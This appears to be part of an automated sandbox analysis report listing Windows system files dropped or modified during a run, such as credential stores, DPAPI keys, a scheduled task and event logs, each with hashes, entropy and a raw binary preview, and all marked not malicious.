                                                                                                                                                                                                                                              Preview:............7.4.1.5.a.3.2.d.-.d.2.c.0.-.4.e.8.d.-.9.4.3.e.-.3.e.8.1.7.e.4.b.f.8.9.4....................................................6j.E+.3F.bt@........f........y.r^(y..O.........._..C....o.7...#.Nv.g.......ex...R.(3U./.o........H...IS.933.....I.;...mA.?-.W.z.\.Ph@FcRQ....S....z..'.u5y$.9.........?G-..#.I7.!..y@........f...V.....<..".I..}..u..|C.'...>(\.3..PNp=...~...........{b...+w...t.,3..A%.G.....`.e.I.....X.~...h^..E.|6s.....................

                                                                                                                                                                                                                                              C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                              Entropy (8bit):4.334962500721157
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:0rotZ1rn:xn
                                                                                                                                                                                                                                              MD5:D973DD8B7ADBDA21BA96B633841F5F63
                                                                                                                                                                                                                                              SHA1:CEB1B9CA94810B99C831BC3A5157507F4C895794
                                                                                                                                                                                                                                              SHA-256:4005C2260364E313B8E84E0588A097880882DA5883CE85DE66C01057388A3F2D
                                                                                                                                                                                                                                              SHA-512:23F649C4CAAF92FDCB8D9E164DB122767BF04BC316C1EB3FFD4247276C48A2A1EC6F00E654B7C59BABE76BC78FF45DE8D71137260C1459D0AFC090BC11C07C35
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:-..t..N.>>.~K....!e.e..

                                                                                                                                                                                                                                              C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):4680
                                                                                                                                                                                                                                              Entropy (8bit):3.7109755968304836
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:pYMguQII4iD6h4aGdinipV9ll7UY5HAmzQ+:9A4r/xne7HO+
                                                                                                                                                                                                                                              MD5:B5F9A40045F64DBC85D6B624E358B099
                                                                                                                                                                                                                                              SHA1:2E8F61AED6AC6EEECC5D3D534307DAB97C7F220F
                                                                                                                                                                                                                                              SHA-256:A7BDFB7537D14F25EF2B115809280C818C1D205565DA38B9E41F988D12262F67
                                                                                                                                                                                                                                              SHA-512:C5BE81044208CB67EF8184B90255BDF2C40A7432F795F7354F0DBD8BABC778F8CAD9AFB5D99D3E8E4938DE9E913A70C8A4BF65A7FC3166C96D3AAE36E382244D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                                                              Entropy (8bit):3.9473632624648336
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kKPPN/xSwfsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:3PNJHkPlE99SCQl2DUevat
                                                                                                                                                                                                                                              MD5:6941EF983D17C3A23A8F7E7B72B3A7FA
                                                                                                                                                                                                                                              SHA1:92CDD0FD9F56AB9B32F2F104E13911019030EFD2
                                                                                                                                                                                                                                              SHA-256:235D3A6D0B9825823B8CCD5B1E653F0006DDD5AB2D16FF933B6AC6619FF17029
                                                                                                                                                                                                                                              SHA-512:006F37DFAB762078577CD8A1B94F66B68700A0485B1C5697FBBA32320A8F89857F0969F22024AA4198E3DE970CAFF19D5F911209D3AE4824CDF6FBA77BA7F423
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ...........x....(...............<P=y....<..i...<...X...........<..i... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                                                                                              Entropy (8bit):3.947821269449896
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kKl+ElvXJtRMhlXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:sMjRamxMiv8sFFKbpgal7BlwhZg
                                                                                                                                                                                                                                              MD5:2BC366BE27FC83D0183010EBE49033D6
                                                                                                                                                                                                                                              SHA1:78F79A05C2CA7DAD133187D199D4F1F86EA4B845
                                                                                                                                                                                                                                              SHA-256:9AB8673DC8026093AC5F29C1073CFADFE1C53298D7A525F26F20A844FDA0B17E
                                                                                                                                                                                                                                              SHA-512:8B36EDED02BB3D35AC373207FBDEFCE8DED7FBBE00A341689AA4F9BA709D610F861C3983CD4356997CEBB9780761DBD20DAF9D5EAE88BB406255120504598141
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ....(...."%.....(.......2..........+......b..'....................b..'.. .........*.Y... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...

                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                              Entropy (8bit):3.44091390511185
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kKqbN/Q8Qts8uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:ybyXvkPlE99Si1QyIeek
                                                                                                                                                                                                                                              MD5:2E035D7652D5FCDAD140D10CC564683C
                                                                                                                                                                                                                                              SHA1:CF00EE365FF689DCD5B360EA4AFF258A4A85AB05
                                                                                                                                                                                                                                              SHA-256:14417F33BD06C972F4E8752F32A8BF29EA1797CAB5D452E715503936D7C7649C
                                                                                                                                                                                                                                              SHA-512:677C997AEF70E89B8089C1F7D4A8DFCAC93871D01FB518D83947AC6457C537F4F44091E5A0877CC489D8712C8F2A0151D1586B5CD077F1B16BDCF8636EF84F27
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ................(................................................W|.i... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):11136
                                                                                                                                                                                                                                              Entropy (8bit):7.976827303688481
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:a5MLemrawF1kQrwNrtpawH5msA524XqTzs+ZkSKxUUP9Ba6CGlXze:qmr7XwVtAwH5Lekw+ZkSKxUsBa/Gde
                                                                                                                                                                                                                                              MD5:5A57A1597471995F12CBA668B5C4795F
                                                                                                                                                                                                                                              SHA1:DC6ECCC78CAA5B0A28371EC06173632E72AC627C
                                                                                                                                                                                                                                              SHA-256:A3A49373027B5B69CCF7BD9309906D2EBFC0351ED21E995771DCCE99D45B6C8A
                                                                                                                                                                                                                                              SHA-512:07923346DC9B74A79F8A25E86B1904860C7929909FA46013B1D27279D1681C561F958E60B6C13CBF42268AA24E186B1BB216843156D47824FD661EEE1D675B25
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:....t+..................z..O......-..t..N.>>.~K..... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ....w.p..(p,%Q ..{e..#*2...Z=..-............ ...m'.9\...........b..|....o+..IXp*....h~.MS5H%.d...l...Hn.?Tt.........p.jG.....UV.28xr...[ C3Hl.....23ay)A.SA.........N....&8t[@O.S...>U]..I.h.6L...."Z.[...8..!...Q.|.gD..*...-~..K..@.'A...E.,.....^...W.c..&...l}./3./}6..p....S....n#.....i\.j_(..-..tN....W|.D.....)..($=.B..E....O./+g..TI.~.$....2..d.f..V.et..!.r.g.>..0...A..2...)d......!.j....z.W..? ...}N.J]..1..1I.Ew.t.?P.Y.*...V6UA`G6.%F..k...w\..n..1...G.R...ZE.L+.a..y..3.^x;.-qwQ...+.^fKjO..u.a^..<..!...h......KL.../.Z.'Z-....{G......E..+..l...(...\s.=...H....E.....BM.g....HV..Q.p..4.......zp...2.WV......`.XT...sP.c......y.......x..{.h).ni._...R.\{...w$..m..+.?.pD=.N....,...vV...). ..>d.&.J......l....}&.O.%.b...:.'G._..86......[lY+&.Z .....)...I.....[.........x..A....8..c(.j...r.&+s...........C..f.N.q.T,.....M..L..Op]..

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Application.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):75840
                                                                                                                                                                                                                                              Entropy (8bit):4.04400451007821
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:fHdL+9/GHdL+9/+gZcobTgNAbP5AAKP5qf5AKP5dfvoXfSPfm4fGfuszpfn8VHd6:fpgcG3bPNKPTKP3GbzF8V4
                                                                                                                                                                                                                                              MD5:032702E177AB5F8EC6EA4F985967E96E
                                                                                                                                                                                                                                              SHA1:02AE727EC3CF0D2C1F8B8EC281A70AF29D614E77
                                                                                                                                                                                                                                              SHA-256:C2288455A2DCB028DE5A60DB346D14766CC63EE37B32312AB9678D0648E33132
                                                                                                                                                                                                                                              SHA-512:D09EDB956A79F83495DE2256924ECC44F4EE07348A006834B570347FE6E5E626FD3722F971DF33BE8C58288F2EDBE5C4380E196A69A4493F151700A3B30E09F5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.................G.......H...........P...(....'......................................................................[...............................................=...........................................................................................................................c...............<...........................j...................M...Y...........................l...............v.......................................................................&...............................**..P...G.......<.au..........x..Y&.......x..Y^.GW...E|..r........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..V............{..P.r.o.v.i.d.e.r...3....=.......K...N.a.m.e.........N.E.T. .R.u.n.t.i.m.e..A..M...w........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n........

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 329, DIRTY
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60248
                                                                                                                                                                                                                                              Entropy (8bit):4.274650822586721
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:mVUHiapX7xadptrDT9W84Gq4dGnMltZtgc2V:5Hi6xadptrX9WP+gj
                                                                                                                                                                                                                                              MD5:F0AEAFBD5ED56C55EB3642E118D4A28B
                                                                                                                                                                                                                                              SHA1:39F8DA3F039281D87E3569813277D8E6D9DB5D8C
                                                                                                                                                                                                                                              SHA-256:45764D71B62D1C8D5778B1CABF316A315C5D9FD4C8E8F6BC61BAB9D731EAEC6A
                                                                                                                                                                                                                                              SHA-512:23563CE6EA9272CD9D6BD897816A9C1D9217B1498807952F1F0A24BAE4186B90F72AE1C8B288B7F949F72AA727C6EBE0430FAE6B58C080422377D13BE67B2CAF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.................I....................................................................................................2..ElfChnk.........J...............J...........h..............................................................................:`b.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.396148699263237
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:jhONk2SCNCrN0KNoBNoiNKNosaNjN4N9NRNCN8NoNjNUNONXN6N6LNvgN1NkNWzP:jgS5itAsZ2DCIEzVFNtPp
                                                                                                                                                                                                                                              MD5:1714E9F375BF402E9FF7644ED82EC285
                                                                                                                                                                                                                                              SHA1:ECB3A4495CEBE4F270C8D94553F027A36F50C42B
                                                                                                                                                                                                                                              SHA-256:20C6A11A8C455A4E4077CC61001BED7C0DD4E6F4FAADBCAD8DDF9A31406F1051
                                                                                                                                                                                                                                              SHA-512:A376B10C14E4EF653991874DE0D730768CC8D9BD49D8C348EED40CD184DA0C2AB47022B0AF6841B0F260598927C63271550A9B2C30F6A0DB1F6A3F830FC16576
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.v...............v...................p.......T..q......................................................................D&................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................}.......................}.......................&...M.......M...........................}...................m...................**......v........^.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):114256
                                                                                                                                                                                                                                              Entropy (8bit):4.286852287662972
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:zV1VbVrVmViVQhpVAVqVjVWVscVcVtVrV51VgVTV/VZVXKVNVjVyVlF/vVIVtVQg:eb8xf4BsuMgkAu4HtWb8xf4BsuMgkSg
                                                                                                                                                                                                                                              MD5:824AA036B8D3A5BAF9EA9CC09834DB43
                                                                                                                                                                                                                                              SHA1:AE5A5B0FDFBBF93770D90AFF9CD1E0D9FF9BD227
                                                                                                                                                                                                                                              SHA-256:122EF898253E610CB1EF2CDCE5DE8F56605A3359B95E763BAECE623066F82242
                                                                                                                                                                                                                                              SHA-512:C0E9170D2A51EA8B421EAEEED81BC9C367404CD784FA6093EEC86760C9D226EEAADCE9E773A61C2179863EE1DF31341AF484562A65553F9B02760B8BF4A919EA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........A...............A...................."......................................................................)..................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F....................................................'..............&.......................................................................%......**......<.........y7a...........E!&...............................................................@.......X..._.!.....E..........@..y7a......`...9..`...........<....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........L...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.....t._.2....**......=......./Lz7a...........

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):67008
                                                                                                                                                                                                                                              Entropy (8bit):4.403044813023599
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:OmWmUhImkmAymRvmVkcmhTiYmBmgmUmWmBmbm4my7mcEZmZmtmZ4mRmKmdm5mqmH:kxkrTiZz+9hZ/07TSPnSKn
                                                                                                                                                                                                                                              MD5:966D50E70BEBD58019FAFEA5B2E0914E
                                                                                                                                                                                                                                              SHA1:0361B64837AB18ED25992C318B9C9AAF372D1240
                                                                                                                                                                                                                                              SHA-256:24DA15A3502B41AD670C9023D4700853CB78EB432E3C108878905D008CB6EF3C
                                                                                                                                                                                                                                              SHA-512:B5BA5B66A035A7EA5F5AAD6D5D778A929A59D5D5FA102F0B08BA5F275A8A18E4DAA8B5F3DDC3ADF05EAA85F804EFDBB9341FDCA77C9171ADCF3B09B5BA2E9B56
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................0........O#.......................................................................X................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................;...c#..{1..k:...................v..........**................p............E!&...............................................................N.......d..._.!.....[..........@..p.......`...'...`................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c.......r.v....**......

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):70680
                                                                                                                                                                                                                                              Entropy (8bit):0.7903575080200846
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:P5V7pp8nMLEvUp8nDp8n+p8n/V7pp8nMLEvUp8nDp8n+p8n:P5hpiMLE8iDi+i/hpiMLE8iDi+i
                                                                                                                                                                                                                                              MD5:0F7251888C86C1377D28856339658EFE
                                                                                                                                                                                                                                              SHA1:C320B9AE7D8A914EAAE7E5ADA5904E3BA82F6D4E
                                                                                                                                                                                                                                              SHA-256:64DEA24E988DAC8B66B4C6E0EC5247DB90519D6376AE38C3EA7F5FE3A0317EB2
                                                                                                                                                                                                                                              SHA-512:B63C22AC91A23861BD827A29FFC63B6FD6E51244A29EBB731AFC1B60F9DF10C520D5F6F73445888C26D171CB61A6343B0007FACE22CE739FF5B3A73EE06133E8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.........................................................................................................................ElfChnk.....................................P.........&E....................................................................RY#.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.248110473220085
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:YbBN2A4VD7VAx8whAGU2woJQghYAxgRzAlUnF9:
                                                                                                                                                                                                                                              MD5:87681F2AD6FCB19982924DCE6A2D7A27
                                                                                                                                                                                                                                              SHA1:6C4D49C5504D6DE6E63B44753C607B3362B79B57
                                                                                                                                                                                                                                              SHA-256:1CA289F8F7FD7DD1D67EDA5691EF4B083120E456204CC8F6923AFCCD700183BC
                                                                                                                                                                                                                                              SHA-512:8F1309E5DD7B017945ABF5EB7E869AA1C04A27C37DB7C3A735A2CB31D815B67643D37DAD93FB89FFF2B6BC213EAE1E55201075DAEAFA39A6B1656A214990DEBA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........]...............]...............0...........................................................................>...............................................=...................................................................................%.......................................X...............?...............................................M...F.......................................................................................>...........................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.625347651139654
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:+XY5nVYIyyqED5BVZUevOBtNPhPVwCRPvf:+XY5nVYIyyqED5BVZUevOBtNPhPVwChf
                                                                                                                                                                                                                                              MD5:890CA9963C766DA05E491710E1CD9D7F
                                                                                                                                                                                                                                              SHA1:3F95AB4363D5DB533E60748F69A364196BAC8920
                                                                                                                                                                                                                                              SHA-256:47523E0AC40BC366CD0A86BE9A72ECEF3A72EE7D430B25A61D8DF55341C19531
                                                                                                                                                                                                                                              SHA-512:C2D739AE5ABF76C627DA8B863CC73FF31F7C7733138DB2954A3102377FD0270F69FE269EEAE0DE4172E53E194C3B71791CD09B36F880DC726665004FD9C6A07F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........................................`....:..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v.......................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):93888
                                                                                                                                                                                                                                              Entropy (8bit):2.1543940208133274
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:afoEK+oy6hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorBort6ohorRg:lDCRMDCRoBI
                                                                                                                                                                                                                                              MD5:E5292F0D91E3AD9B0F116E3C83A17698
                                                                                                                                                                                                                                              SHA1:D77FB65F6AD273A241117E842643E1F4417EB371
                                                                                                                                                                                                                                              SHA-256:DBB09D596B8329C1BF123755024DC16D4E2B2B197327A5DF2FF99C93E6231BAE
